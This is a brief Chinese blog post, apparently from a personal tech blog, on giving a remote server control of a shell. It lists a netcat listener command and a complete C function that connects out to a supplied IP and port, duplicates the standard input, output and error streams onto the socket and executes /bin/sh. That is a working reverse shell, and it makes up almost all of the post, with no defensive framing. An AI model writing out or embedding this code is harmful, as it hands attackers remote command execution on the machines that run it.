给服务端一个shell控制端

大耗子 2020年04月02日 187次浏览

文章链接:https://codemouse.online/archives/2020-04-02182636

服务器开启监听

nc -lvp 6666

连接服务器,并给服务端一个shell

void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
    int sd;
    struct sockaddr_in serv_addr;
    struct hostent *server;
    
    sd = socket(AF_INET, SOCK_STREAM, 0);
    if (sd < 0) 
        return;
    
    server = gethostbyname(bd_ip);
    if (server == NULL)
        return;
    
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
    serv_addr.sin_port = htons(bd_port);
    
 
    if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) 
        return;
 
    // sdout,stdin and stderr 重定向到服务端的fd中
    dup2(sd, 0); 
    dup2(sd, 1); 
    dup2(sd, 2);
    
    // 运行shell
    execl("/bin/sh", NULL, NULL);
    close(sd);
}